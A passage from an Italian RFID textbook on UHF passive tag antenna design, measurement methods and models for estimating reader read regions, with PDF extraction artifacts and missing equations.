(6) sono riportate nella tabella Tabella III.1, dove Δf=fmax - fmin e B=Δf /fc. e si può notare che La IFA presenta una banda un poco più larga dellaMLA. Tuttavia la configurazione MLA possiede un più alto numero digradi di libertà e di conseguenza è possibile aggiungere ulteriori vincolinell’ottimizzazione genetica in modo da agire anche sull’allargamentodella banda.

ALTRE TECNICHE DI PROGETTO

Questo paragrafo introduce altri aspetti del progetto di antenne per TAGUHF, non direttamente riconducibili alla precedente classificazione, qualii TAG dual band o a doppia polarizzazione ed i nuovi TAG UHF perapplicazioni di Near Field Communication (NFC).

PARTE III - ACCOPPIAMENTO, ENERGIA & ANTENNE NEI TAG PASSIVI177

Figura III.35Guadagno massimo, fattore di adattamento inpotenza e guadagno realizzato al variare della

frequenza per i tag IFA e MLA aventi dimensioninon eccedenti un quadrato di lato 5cm. La riga

orizzontale per τGtag =0.5 permette diapprezzare la larghezza di banda dei TAG

all’interno della quale la distanza di lettura nonscende al disotto del 70% della distanza di

attivazione dell’antenna di riferimento aventeguadagno realizzato unitario.

Tabella III.1:caratteristiche di banda per i TAG IFA e MLA

di Figura III.34

III.4.3

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 177

Page 171: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

4.3.1 TAG dual band

Un’antenna può funzionare su distinte bande di frequenza facendo inmodo di introdurre più elementi risonanti oppure eccitando armoniche diordine superiore. Nel contesto RFID sono state recentemente propostesoluzioni progettuali per ottenere TAG compatti in grado di funzionarecontemporaneamente alle frequenze 870MHz e 2,45 GHz oppure 2,45GHz e 5,8 GHz. L’idea di base è di caricare una geometria tradizionale diTAG con elementi parassiti di sintonia quali una slot innestata oppureuno o più stub. Uno dei vincoli importanti è sicuramente quello di man-tenere contenute le dimensioni dell’antenna risultante e quindi gli ele-menti di sintonia sono spesso integrati all’interno della parte radiante stes-sa. La Figura III.36 fornisce quattro esempi di TAG dual band.a) TAG planare [99] con slot sagomate al duplice scopo di ottenere duefrequenze operative a 868MHz e 2450 MHz e contemporaneamente diridurre le dimensioni dell’antenna alle frequenza più bassa.

b) Antenna a microstiscia avente forma di frattale di Sierpisky [100] otti-mizzato alle frequenze di 2,45 GHz e 5,8 GHz. La struttura è alimen-tata da una linea di trasmissione a microstiscia, per la quale il frattalefunge da piano di massa. Le dimensioni esterne del triangolo fissano lafrequenza più bassa di lavoro mentre le dimensioni interne intervengo-no sulla seconda frequenza.

c) Dipolo caricato con slot [101] per le frequenze 870MHz e 2450MHz.La lunghezza complessiva del dipolo fissa la frequenza di lavoro piùbassa. Le slot innestate nel dipolo funzionano come interruttori [102]che a particolari frequenze impediscono la circolazione della correntee quindi riducono virtualmente la lunghezza dell’elemento radiante,producendo una risonanza alle frequenze più elevate.

d) PIFA con stub in circuito aperto per il tuning [57]. Modificando la larghez-za e la lunghezza dello stub è possibile adattare l’antenna contemporanea-mente a due frequenze (870 MHz, 915 MHZ nel riferimento riportato)

4.3.2 TAG con doppia polarizzazione

TAG con doppia polarizzazione sono richiesti per ridurre la dipendenzadella distanza di lettura dalla orientazione mutua tra READER e TAG, ma

RFID - Fondamenti di una tecnologia silenziosamente pervasiva178

Figura III.36Esempi di geometrie di TAG a doppia

frequenza

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 178

Page 172: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

anche per ricevere e ritrasmettere indietro energia da e verso antenne condiversa polarizzazione. In queste geometrie sono spesso usate slot ortogo-nali [103] che alimentano un patch convenzionali oppure dipoli incrocia-ti [104].

4.3.3 TAG UHF per Near Field Communication

Le applicazioni di Near Field Communication (NFC), che inizialmenteerano limitate alle basse frequenze (HF), cominciano ora ad interessareanche la banda UHF per la maggior capacità trasmissiva possibile e ledimensioni ancor più ridotte dei TAG. In questo contesto il TAG opera adistanze piccolissime dal Reader, addirittura nel suo campo vicino (si con-sulti al riguardo la rassegna in [105]). Due tecniche ad ora utilizzate neiprimi esperimenti per creare regioni di attivazione molto piccole consisto-no nell’usare TAG convenzionali e Reader emittenti bassissima potenza,in modo che il TAG risponda solo qualora si trovi a piccola distanza dalReader, oppure Reader con la stessa potenza delle applicazioni convenzio-nali in far-field, ma TAG disadattati in modo che la massima distanza dilettura sia ridotta a pochi centimetri. Ambedue queste soluzioni tecnichemostrano però lo svantaggio di non permettere alcuna riduzione delledimensioni del TAG (primo caso) e di non produrre una regione di lettu-ra localizzata (secondo caso) così che il Reader potrebbe interagire, inmaniera non intenzionale, con altri TAG presenti nella regione di far-field.

Soluzioni progettuali più efficaci consistono nel realizzare il TAG conun avvolgimento in modo da creare un forte accoppiamento magneticocon il Reader, come nel caso dei sistemi in HF. Grazie però alla più altafrequenza di lavoro, le dimensioni del loop risultano sensibilmente infe-riori a quelle di omologhi TAG in HF e l’avvolgimento richiesto potreb-be essere integrato in un TAG UHF tradizionale, per esempio nella stes-sa geometria del T-match o del loop accoppiato, in modo che lo stessoTAG possa essere usato sia nel far field che nel near field. Un esempio intal senso è stato citato in § II.4.5

Il progetto di TAG UHF per applicazioni NFC presenta varie però cri-ticità in quanto, per effetto della piccola distanza dal Reader, l’accoppia-

PARTE III - ACCOPPIAMENTO, ENERGIA & ANTENNE NEI TAG PASSIVI179

141-200.qxp:RFID 9-09-2008 11:00 Pagina 179

Page 173: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

mento con esso non può più essere trascurato ed i parametri delle anten-ne del Reader e del TAG non possono essere più espressi e trattati indi-pendentemente. Una parte degli sforzi va quindi rivolta allo sviluppo diefficaci modelli numerici, basati per esempio sul Metodo dei Momenti osul metodo delle Differenze Finite nel Dominio del Tempo [106], pertenere in conto di tutti i fenomeni di interazione.

MISURA E TEST DI ANTENNE PER TAG PASSIVI IN UHF

Vengono ora introdotte brevemente alcune problematiche relative allacaratterizzazione sperimentale delle antenne per TAG UHF. La misuradelle prestazioni dei TAG non è un disciplina completamente assestata,come invece nel caso delle antenne convenzionali adattate a 50 Ω e si ritie-ne che una caratterizzazione dell’antenna in assenza di chip sia un passoindispensabile all’affinamento del processo di sintesi geometrica ed elet-trica. Semplificando, la caratterizzazione sperimentale dovrebbe seguire itre passi seguenti:1) misura dell’impedenza d’ingresso e del guadagno dell’antenna in

assenza di chip; 2) misura della radar cross-section per qualche condizione rappresentati-

va di terminazione della porta dell’antenna (per esempio corto circui-to e circuito aperto):

3) misura della distanza di lettura quando sia stato stabilito un link traReader e TAG ed in tal caso quest’ultimo si suppone fisicamente con-nesso allo specifico Reader.Queste misure andrebbero ripetute per vari target sui quali sia posto il

TAG.

4.4.1 Misura dell’impedenza d’ingresso e del guadagno

Queste misure richiedono la connessione dell’antenna del TAG all’analiz-zatore di rete (VNA) tramite cavo coassiale, in assenza del microchip. Lanecessità di misurare una struttura bilanciata, come nel caso della granparte dei TAG, essendo versioni modificate di un dipolo, richiede di pre-vedere un balun oppure un choke per evitare un ritorno delle correnti di

RFID - Fondamenti di una tecnologia silenziosamente pervasiva180

III.4.4

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 180

Page 174: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

eccitazione dell’antenna verso il VNA stesso. In questo caso, stante le pic-cole dimensioni delle antenne, è necessario verificare che la presenza delbalun o del choke non perturbi le caratteristiche di radiazione del TAG.E’ invece possibile eseguire misure molto accurate, e decisamente inmaniera molto più semplice, qualora il TAG sia un’antenna provvista dipiano di massa, come nel caso di alcune geometrie a PIFA, oppure quan-do il TAG possegga un piano di simmetria elettrica come nelle strutture adipolo. In questa condizione si può realizzare solo metà della struttura daporre in verticale sopra un piano conduttore che funge da piano immagi-ne. La sonda del VNA potrà essere quindi facilmente connessa ad un con-nettore posto sul piano di massa stesso, dal quale si erge in verticale lametà di antenna, senza che sia richiesto alcun meccanismo di balun. Atitolo d’esempio è riportato in Figura III.37 l’assetto di misura [82] perun TAG realizzato con un patch sospeso, alimentato con una slot innesta-ta.Il guadagno d’antenna si può misurare con le tecniche convenzionali e

tutti i parametri prestazionali del TAG (guadagno realizzato, larghezza dibanda e distanza di lettura) possono quindi essere calcolati in post-elabo-razione.

4.4.2 Misura della Radar cross section del TAG

Una parte importante della comunicazione tra il Reader ed il TAG consi-ste nella riflessione (backscattering) da parte del TAG del campo elettro-magnetico in onda continua proveniente dal Reader. Durante questa fase,il microchip agisce come un interruttore programmabile che connette odisconnette all’antenna un carico Zmod, tipicamente un circuito apertoper avere alta impedenza (o stato logico basso) e un corto circuito (oppu-re una impedenza coniugata a quella dell’antenna) per realizzare lo statologico alto.Durante il trasferimento dati, il sistema RFID può essere considerato

come un radar monostatico e quindi può essere caratterizzato dalla suasezione di scattering (radar cross section - RCS) σT. Come discusso indettaglio in [107], l’RCS delle antenne per TAG UHF può essere riferitoal guadagno d’antenna e all’impedenza d’ingresso dalla relazione:

PARTE III - ACCOPPIAMENTO, ENERGIA & ANTENNE NEI TAG PASSIVI181

Figura III.37Prototipo in rame di un TAG a slot innestatacome in Figura III.26, progettata per essereposta su di un contenitore riempito di unamiscela liquida simulante le caratteristiche

fisiche del corpo umano. La misura èrealizzata in modalità chip-less con il metodo

del piano immagine per cui è necessariorealizzare solo metà dell’antenna. Il

connettore di interconnessione dell’antennaal cavo coassiale del VNA si trova al disotto

del piano di massa.

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 181

Page 175: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

L’RCS di un TAG privo di microchip può essere misurato come variazio-ne del coefficiente di riflessione S11 alla porta dell’antenna illuminante. Lamisura va normalmente ripetuta per varie impedenze di terminazione delTAG. Sebbene si tratti di una misura indiretta, che non fornisce informa-zioni sull’impedenza d’ingresso del TAG o sulla distanza di attivazione, per-mette comunque una caratterizzazione del TAG indipendente dal Reader.

4.4.3 Misura della distanza di lettura

Nella fase di sviluppo di nuovi TAG, la misura della distanza di letturadovrebbe essere eseguita dopo la caratterizzazione chip-less precedente-mente descritta. Infatti, la distanza di lettura è un parametro prestaziona-le globale che dipende dallo scenario, dalla particolare scelta del target,dalle caratteristiche del Reader (guadagno, polarizzazione e potenza dialimentazione) e infine dalle caratteristiche del microchip [108], enasconde completamente il comportamento elettromagnetico del TAG.La misura può essere eseguita in un ambiente reale oppure, in modo sem-plice e soprattutto ripetibile, in un ambiente controllato quale una came-ra anecoica o una cella TEM [62]. Nel caso in cui si faccia riferimento adun ambiente reale non è richiesta strumentazione specifica oltre al Reader.Con questa strumentazione è inoltre possibile ottenere una caratterizza-zione sperimentale del guadagno realizzato del TAG quando sia postosullo specifico target. A tal fine, tenendo fissa la distanza tra Reader eTAG, e partendo da un valore nullo di potenza in ingresso al Reader, siaumenta tale potenza fino a che il TAG non venga identificato. Noto ilguadagno del Reader e la sensibilità del microchip, il valore della potenzadi soglia del Reader che permette di accendere il TAG fornisce una misu-ra indiretta, tramite la (1) del fattore τGT.

MISURA E TEST DI ANTENNE PER TAG PASSIVE IN UHF

Tra le varie configurazioni considerate, i TAG con geometria a Meander

RFID - Fondamenti di una tecnologia silenziosamente pervasiva182

III.4.5

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 182

Page 176: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Line presentano il più alto numero di gradi di libertà per cui, ricorrendoad ottimizzatori automatici, si riesce a dimensionarne la forma in modo daadattare varie famiglie di microchip. In teoria è anche possibile tenerconto della presenza del target (realizzando quindi TAG ad-hoc per l’ap-plicazione specifica) introducendo nel modello matematico dell’antennaanche le equazioni di mezzi stratificati che localmente riproducano lecaratteristiche fisiche e geometriche essenziali dell’oggetto.Le configurazioni tipo (P)IFA sono invece particolarmente interessan-

ti per le applicazioni su oggetti metallici o ad alta permettività e, comepure i patch con la slot innestata, sono altresì adatte ad ospitare sensori edelettronica aggiuntiva.In ogni caso, la larghezza di banda dei TAG UHF è tipicamente stret-

ta, soprattutto quando si richieda di contenere le dimensioni dell’antennaall’interno di pochi centimetri quadrati. Di conseguenza le prestazionielettromagnetiche del TAG risultano fortemente dipendenti dalle varia-zioni delle caratteristiche del target. La sfida ancora aperta riguarda quin-di l’individuazione di configurazioni geometriche di TAG ad uso genera-le e cioè poco dipendenti dall’oggetto.

STIMA DELLA REGIONE DI FUNZIONAMENTO NELL’AM-BIENTE OPERATIVO

PARAMETRI E MODELLI

La zona di lettura è uno dei principali indicatori delle prestazioni di unsistema RFID in quanto determina l’applicabilità di questa tecnologia aduno specifico contesto. Essa dipende da molti parametri fisici e geometri-ci ma tipicamente, nella banda di Frequenze UHF (860 MHz – 960MHz), la dimensione massima della zona di lettura viene stimata con ilmodello di propagazione in spazio libero, basato sulla formula di Friis. Inambienti chiusi o comunque in presenza di oggetti scatteratori la formuladi Friis è una approssimazione non sempre valida, perciò previsioni moltopiù accurate possono essere fatte attraverso simulazioni elettromagnetiche

PARTE III - ACCOPPIAMENTO, ENERGIA & ANTENNE NEI TAG PASSIVI183

III.5

III.5.1

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 183

Page 177: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

che tengono conto delle caratteristiche delle antenne e dell'interazionecon l'ambiente circostante. Questo capitolo affronta con modalità sistemi-stica la stima tridimensionale della regione di lettura, facendo ricorso atutti i dati accessibili del sistema, come la potenza emessa, i diagrammi diradiazione del Reader e del TAG, il duty cycle dell'interrogazione, lecaratteristiche dello scenario e i vincoli imposti dal regolamento sulla sicu-rezza sanitaria. Inoltre viene proposta una formula di miglioramento del-l’approssimazione di spazio libero, chiamata modello a due raggi, cheprende in considarazione le principali interazioni con l’ambiente e ne vienediscussa la validità mettendola a confronto per alcuni ambienti realisticicon un'accurata simulazione 3D basata sulla tecnica del ray-tracing.L’insieme delle formule prodotte sono pronte per l'utilizzo e possono esse-re applicate per la pianificazione e l’ottimizzazione di reti Reader-TAG.Nel contesto dei sistemi RFID passivi nella banda UHF, la regione di

lettura dipende strettamente dalla potenza emessa dal Reader, dalla sensi-bilità del TAG , dal guadagno realizzato, dall'orientazione delle antenne[110] e anche dallo scenario circostante [111]. Il collegamento Reader-TAG è composto da due tratte: dall'antenna del Reader all'antenna delTAG (tratta non modulata), e dall'antenna del TAG a quella del Reader(tratta modulata). L'esponente del path-loss del collegamento complessi-vo (cioè l’insieme delle due tratte) nello spazio libero è approssimativa-mente doppio rispetto a quello di un collegamento a singola tratta nellostesso ambiente. Tuttavia, la prima tratta è quella maggiormente critica aifini della realizzazione del collegamento in quanto deve tener conto dellasoglia di potenza per l’attivazione del microchip del TAG, pertanto essarappresenta il cosiddetto collo di bottiglia dell'intero collegamento.D’altra parte, il campo elettrico irradiato non può assumere valori cheeccedono la soglia stabilita dalle normative sanitarie (per scopi protezio-nistici) e deve essere compatibile con la suscettibilità delle attrezzatureelettroniche circostanti. L'installazione di un Reader pertanto potrebbeessere fortemente influenzata da questi vincoli per cui la posizione in cuiviene istallato e la scelta della potenza emessa saranno il risultato di uncompromesso tra la massima zona di lettura richiesta per la particolareapplicazione e il rispetto delle normative.

RFID - Fondamenti di una tecnologia silenziosamente pervasiva184

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 184

Page 178: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Sebbene ci siano diversi articoli sulla caratterizzazione elettromagneti-ca dei dispositivi RFID/EAS a basso range e bassa frequenza [113], moltomeno è invece disponibile sul ruolo dell'ambiente [112] e sui vincoli all'e-sposizione alla potenza in gamma UHF.

5.1.1 Definizione dei parametri di un sistema RFID

Il reader può essere caratterizzato elettromagneticamente con la potenzain ingresso all’antenna Pin e con il vettore di radiazione o del-l’antenna che dipende dagli angoli polare e azimuthale del sistema di rife-rimento sferico posizionato sull’antenna. Il campo irradiato in un puntodello spazio libero r è quindi

(8)

dove GR è il guadagno dell’antenna ,ZOè l’impedenza intrinseca del vuoto e , essendo λ la lunghezzad’onda.In un ambiente Ω diverso dallo spazio libero, per esempio Ω è un

ambiente indoor con pareti e oggetti scatteranti, il campo elettromagneti-co si può esprimere come

(9)

dove PΩ è un operatore, detto di proiezione del campo, che si applicaal pattern di radiazione del Reader e che dipende dallo specifico ambien-te considerato.I parametri che caratterizzano il TAG sono la sensibilità Pc del micro-

chip (cioè il valore minimo di potenza a radiofrequenza richiesta per atti-vare il microchip) e il coefficiente della potenza trasmessa

(10)

PARTE III - ACCOPPIAMENTO, ENERGIA & ANTENNE NEI TAG PASSIVI185

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 185

Page 179: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

che tiene cono del disaddattamento di impedenza tra l’antenna(ZA=RA+jZA) e il microchip (Zchip=Rchip+jZchip).La potenza che il microchip riesce a recuperare è quindi:.

(11)

dove è la densità di potenza in un punto r∈Ω,è il guadagno dell’antenna del TAG e χ è il coefficiente di dis-

adattameno di polarizzazione tra l’antenna del TAG e il campo incidentesu di essa. Generalmente il campo irrradiato dal Reader è in polarizzazio-ne circolare mentre l’antenna del TAG è in polarizzazione lineare perciòin spazio libero χ =0,5. In un ambiente complesso il campo subisce unfenomeno di depolarizzazione per cui non è facile stimare χ ma per sem-plicità si ammette che il valore χ =0.5 sia mediamente ammissibile.La rreeggiioonnee ddii lleettttuurraa ( read-volume) ΩR è il volume di spazio in cui la

potenza raccolta dal TAG eccede la sua soglia di sensibilità ed è quindiattivato. Poichè la potenza raccolta dipende dall’orientamento del TAG(poichè l’antenna del TAG non è ispotropica), si assume che GT sia unguadagno mediato sull’angolo. La regione di lettura è quindi

(12)

Le equazioni (8) e (11) si evince che l’estensione del read volumedipende dalla potenza in ingresso, dal diagramma di radiazione del rea-der, e dalla sensibilità efficace del microchip (effective microchip’s sensiti-vity)

(13)

che risulta perciò essere un macro-indicatore delle prestazioni del TAGsopra un oggetto. Essa indica il minimo livello di potenza a radiofrequen-za che il TAG deve raccogliere per esibire, in media, la stessa distanza dilettura in spazio libero di un tag isotropico isolato e perfettamente adat-tato (GTτ=1). Difatti quando il TAG è posto sopra un oggetto le sue pre-

RFID - Fondamenti di una tecnologia silenziosamente pervasiva186

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 186

Page 180: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

stazioni sono degradate a causa dalle perdite dell’oggetto e del disadatta-mento di impedenza che esso produce quindi, un TAG attaccato ad unoggetto avrà le stesse prestazioni di un TAG ideale avente una soglia dipotenza di attivazione più alta. La condizione (11) può quindi essere riscritta come

(14)

La tratta di collegamento dal TAG al Reader che dipende dalla poten-za scatterata all’indietro è meno critica di quella Reader-TAG poichè lasensibilità del Reader è migliore di quella del TAG [113] quindi il collo dbottiglia del collegamento è difatti imposto dalla potenza di attivazionedel TAG vincolando la regione di lettura dell’intero collegamento. Sotto opportune condizioni si può configurare una rreeggiioonnee ddii iinntteerrddii--

zziioonnee è lo spazio in cui il campo elettrico efficace, mediato su un interval-lo temporale prestabilito Tav, è maggiore di un valore massimo, E0, per-messo dalle normative sulla sicurezza. In generale, il Reader può interro-gare l’ambiente circostante secondo un dato periodo di ripetizione T0 , eindicato con Tcom la durata di una tipica comunicazione Reader-TAG, ilduty-cycle è d=Tcom/T0 . La regione di interdizione è quindi

(15)

in cui è il campo del reader mediato nel tempo.Lo spazio in cui il TAG è attivato e il campo emesso rispetta la sicurez-

za ed i requisiti di compatibilità elettromagnetica, verrebbe quindi indica-to come regione di lettura utile:

(16)

I parametri chiave che influenzano ΩU sono il fascio e il guadagno del-l’antenna del Reader, la potenza in ingresso, il ritmo di interrogazione, lasensibilità effettiva del TAG e infine il particolare scenario. La regione diinterdizione in genere si estende in prossimità dell’antenna del Reader, e

PARTE III - ACCOPPIAMENTO, ENERGIA & ANTENNE NEI TAG PASSIVI187

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 187

Page 181: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

quindi si prevede che la regione utile sia un volume cavo.

5.1.2 Il modello in spazio libero

La densità di potenza dovuta al Reader nello spazio libero è, perciò la regione di lettura è racchiusa dalla

superficie data da

(17)

L’equazione (17) viene in genere valutata assumendo il massimo guada-gno dell’antenna del Reader e del TAG e perdendo in tal modo l’informa-zione sulla forma della superficie. In questo contesto si assume che GT siail valore mediato sull’angolo, come definito precedentemente, in modo datener conto dell’orientazione random del TAG mentre la dipendenzaangolare dell’antenna del Reader è preservata. Sebbene tale dipendenzaangolare non è generalmente disponibile nel datasheet fornito dal costrut-tore del Reader si può risalire in maniera approssimata alla forma del loboprincipale del diagramma di radiazione conoscendo il tipo di antenna uti-lizzato. La maggior parte delle antenne usate per il Reader infatti sono deltipo ad elica [90] o patch a polarizzazione circolare [114], per questi tipidi antenne il lobo principale del diagramma di radiazione è approssimati-vamente schematizzabile con un ellissoide il cui asse maggiore rappresen-ta il guadagno massimo mentre gli assi minori sono riferiti alla larghezzadel fascio dell’antenna sui due piani principali. In questo modo la regio-ne di funzionamento del sistema Reader-TAG è racchiusa dall’ellisoide

(18)

in cui si assume che l’antenna sia posta in x=0, e irradi in direzione x>0.La lunghezza degli assi dell’ellisoide dipende dai principali parametri delsistema RFID, come l’ EIRP, la sensibilità del TAG e la larghezza di fascioa mezza potenza dell’antenna del Reader sui piani principali (BWxy eBWxz). In particolare gli assi dell’ellisoide possono essere calcolati utilizzan-do proprio la definizione di larghezza di fascio a mezza potenza e quindi

RFID - Fondamenti di una tecnologia silenziosamente pervasiva188

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 188

Page 182: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

imponendo che il punto A della costruzione geometrica mostrata in FiguraIII. 38, appartenga alla superficie dell’ellissoide, in tal modo si ottiene

(19)

dove e è il massimo guadagno dell’antennadel reader nella direzione broadside nell’equazione (19))pertanto in spazio libero, la massima distanza di lettura è definita come

. Il diagramma di radiazione delle antenne a polarizzazio-ne circolare, inoltre, mostra tipicamente una simmetria rotazionale per laquale si assume che i due assi minori dell’ellisoide sia uguali cioè

5.1.3 Il modello a due raggi

In un ambiente operativo realistico sono presenti oggetti scatteratori chepossono influire sull’estensione della regione di funzionamento del siste-ma RFID, in particolare la regione di lettura potrebbe avere minore esten-sione di quella in spazio libero a causa delle interferenze del campo irra-diato dall’antenna del Reader con quello scatterato dagli oggetti e dallepareti dell’ambiente. Per stimare l’estensione della regione di lettura inmodo semplice sebbene approssimato si ricorre al cosiddetto modello adue raggi. Tale modello considera l’interferenza di soli due contributi dicampo, quello irradiato e quello riflesso da un ostacolo posto a distanzaD di fronte all’antenna del Reader. Per semplicità si schematizza l’ostaco-lo come una superficie piana ortogonale alla direzione di massimo guada-gno dell’antenna . L’operatore di proiezione del campo (9) tieneconto quindi del contributo di due raggi interferenti nei punti della lineacongiungente il Reader all’ostacolo lungo la direzione , per unacomponente scalare è quindi dato dalla seguente espressione

PARTE III - ACCOPPIAMENTO, ENERGIA & ANTENNE NEI TAG PASSIVI189

Figura III.38Costruzione geometrica per determinare la

lunghezza degli assi dell’ellisoideapprossimante la regione di funzionamento

del sistema Reader-TAG in spazio libero.

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 189

Page 183: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

(20)

in cui il simbolo è usato per indicare la generica componente sca-lare del campo, mentre è l’ampezza del coefficiente di riflessio-ne di Fresnel dell’ostacolo e r è l’ascissa lungo la linea congiungente il rea-der all’ostacolo. Al variare della variabile r , PΩ si presenta come una fun-zione oscillante con valori minimi nei punti . Quando ilTAG viene spostato lungo tale linea anche la potenza raccolta dal microchipè oscillante come mostrato dalla curva in Figura III.39. La distanza r2rays, incui il livello di potenza minimo (curva b in Figura III.39) raccolta dal TAGuguaglia la sensibilità efficace del microchip può essere stimata usando l’e-quazione (14) e il proiettore di campo (20). Si ottiene la seguente equazione

(21)

la cui risoluzione richiede una breve discussione. La funzione argomen-to del valore assoluto “|..|” è sempre positiva o nulla per ,pertanto, all’interno di tale intervallo l’equazione (21) può essere ricon-dotta alla seguente

(22)

che rappresenta un polinomio di secondo grado in cui una delle duesoluzioni non appartiene all’intervallo e quindi viene scartata. Nel caso particolare di parete perfettamente conduttrice (Γ=1) la mas-

sima distanza di lettura predetta dal modello a due raggi è

(23)

Dal punto di vista operativo può essere utile la risoluzione grafica del-l’equazione (22) mostrata in Figura III.40. Essa permette di valutare lamassima distanza di lettura del modello a due raggi r2rays a partire dallaconoscenza di quella in spazio libero e rFS, per diversi valori della distan-za D e per i casi Γ=1 e Γ=0,5.

RFID - Fondamenti di una tecnologia silenziosamente pervasiva190

Figura III.40Massima distanza di lettura per il modello a

due raggi rispetto a quella in spazio libero. Ddistanza mutua tra il reader e la parete postadifronte ad esso, ampiezza del Γ coefficiente

di riflessione

Figura III.39Potenza ricevuta dal microchip nel caso del

modello a due raggi in presenza di unaparete perfettamente conduttrice. Curva (a)

interferenza tra il contributo riflesso e quellodiretto; curva (b) minima potenza ricevuta.

Gli assi hanno scala arbitraria.

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 190

Page 184: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Per piccoli valori di rFS rispetto a D, (per esempio quando l’interazio-ne Reader-TAG avviene su piccole distanze), il modello a due raggi èlineare con quello in spazio libero fornendo valori di r2rays prossimi a rFS.Per valori elevati di rFS, invece, (come nel caso di valori alti dell’EIRP delreader e alta sensibilità, quindi basso , del TAG), il modello a dueraggi tende asintoticamente al valore . In tal caso la regione di lettu-ra è sottostimata e quindi il modello in spazio libero è da preferirsi a quel-lo a due raggi rimpiazzando r2rays con rFS. Euristicamente è stato osserva-to che il modello a due raggi è maggiormente attendibile di quello in spa-zio libero quando D/2<rFS<D, fuori da tale intervallo il modello in spaziolibero rimane valido. Dopo aver calcolato r2rays si determina l’ellissoide approssimante la

regione di lettura in un ambiente reale imponendo ax=r2rays / 2 nell’equa-zione (19).

5.1.4 Il modello a ray-tracing

In un ambiente elettromagneticamente complesso come un ufficio o unsupermercato in cui sono presenti numerosi oggetti, il campo irradiatodall’antenna del Reader subisce il fenomeno del multipath a causa delloscattering dovuto agli oggetti. Riflessione, trasmissione e diffrazione sonoi principali fenomeni che sostengono il multipath determinando il cosid-detto fast fading del segnale. Per modellare l’insieme di tutti questi feno-meni che prendono origine dai vari oggetti si può ricorrere a tecniche dicalcolo numerico basate sul ray-tracing e sulla toeria dell’ottica geometri-ca (GO) e della teoria uniforme della diffrazione (UTD) [115]. Nel modello a ray tracing si assume che l’antenna del Reader sia suffi-

cientemente lontana dagli oggetti presenti nell’ambiente in modo da potertrascurare l’accoppiamento con essi. Il campo irradiato può essere ottenu-to usando metodi full-wave per modellare l’antenna oppure usando for-mule analitiche che ne descrivono il comportamento in condizione dicampo lontano. In questo caso l’antenna è considerata puntiforme con unassegnato diagramma di radiazione ottenibile dalla conoscenza di . Ilcampo in un punto dell’ambiente è calcolato sovrapponendo il contribu-to di numerosi raggi ciascuno dei quali subisce una differente successione

PARTE III - ACCOPPIAMENTO, ENERGIA & ANTENNE NEI TAG PASSIVI191

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 191

Page 185: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

di interazioni (riflessione, diffrazione, trasmisione) con l’ambiente, ilproiettore di campo PΩ in (9) è quindi dato dalla seguente espressione

(24)

in cui

(25)

Sk è il cammino ottico del k-esimo raggio che subisce Hk interazioniper riflessione, trasmissione e diffrazione; nk è l’indice di rifrazione del h-esimo segmento del raggio; è un diadico che tiene conto dei coeffi-cienti GO/UTD di ciascuna componente di campo e dello sparpaglia-mento del campo dovuto alla propagazione. In questo contesto viene usato il particolare metodo di ray-tracing

[116] basato su uno schema proiettivo [117] che permette di individuaretutte le regioni tridimensionali dello spazio attraversate dalle congruenzedi raggi provenienti dalle sorgenti primarie e secondarie presenti nell’am-biente di propagazione.Il vettore radiazione dell’antenna del Reader può essere ottenuto con

calcolo numerico se si dispone di una dettagliata conoscenza della geome-tria dell’antenna oppure attraverso misure, tuttavia un modello semplifi-cato ma alquanto accurato può essere ottenuto per via analitica se sirestringe l’interesse ai Reader con antenne a patch. Si osserva infatti che ilvettore radiazione può essere descritto a partire dalla cono-scenza di uno o due parametri sempre disponibili all’utente cioè il gua-dadgno e la larghezza del fascio.

Il modello d’antenna è rappresentato in Figura III.41 ed è costituito dadue coppie di linee di correnti magnetiche uniformi, una orizzontale e unaverticale che nello schema giacciono sul piano perfettamente conduttoreed infinitamente esteso (y, z):

RFID - Fondamenti di una tecnologia silenziosamente pervasiva192

Figura III.41Modello dell’antenna del reader costituito daun array orizzonatale ed uno vertciale di due

linee di corrente megnetica uniforme.

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 192

Page 186: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

(26)

Il parametro L è la lunghezza della linea di corrente e i coefficienti Av,Ah=0, ±1, ±j determinano la polarizzazione lineare (orizzontale e verti-cale) o circolare. Questo modello è applicabile sia alle antenne a patch chea quelle a slot [118] ma anche alle varianti folded e inverted patch. Il gua-dagno o la larghezza del fascio possono essere ricavati con buona appros-simazione dalla conoscenza della lunghezza L. Seguendo il formalismoespresso in [118] e [76], il corrispondente vettore di radiazione è espres-so secondo la componente verticale ed orizzontale:

(27)

(28)

mentre il vettore di radiazione totale si ottiene come nel caso di unarray per sovrapposizione:

(29)

